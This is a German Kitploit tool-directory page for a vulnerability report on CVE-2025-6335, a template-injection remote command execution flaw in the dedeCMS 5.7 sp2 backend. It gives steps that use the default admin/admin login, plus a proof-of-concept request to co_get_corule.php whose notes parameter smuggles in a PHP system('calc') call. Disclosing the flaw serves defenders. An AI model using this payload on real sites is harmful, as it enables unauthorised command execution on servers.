Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6335 — cve-Bericht | Kitploit
Tools/GitHubGitHub/jujubooom/cve-2025-6335
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

cve-Bericht

Repository anzeigen
6vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Titel: Template-Injection-Befehlausführungsschwachstelle in dedeCMS 5.7 sp2

Bug-Autor: Ewoji

Betroffene Version: dedeCMS < 5.7.2

Anbieter: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Schwachstellendateien:

  • /include/dedetag.class.php

Beschreibung:

  1. Nach der Installation, melden Sie sich im Backend an

    • Verwenden Sie das Standardkonto admin/admin
  2. Ausnutzen der Vorlage

    • Greifen Sie auf die dede/co_get_corule.php-Schnittstelle zu
    • Übergeben Sie den Parameter /dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1. Zweimaliges Aufrufen führt zur Befehlsausführung
  3. Überprüfen des Exploits:

    • Bei erfolgreicher Injektion kann der Angreifer beliebige Befehle ausführen

Proof of Concept:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

Detail:CVE-2025-6335-dedeCMS Backend-Vorlageninjektion RCE

Tool herunterladen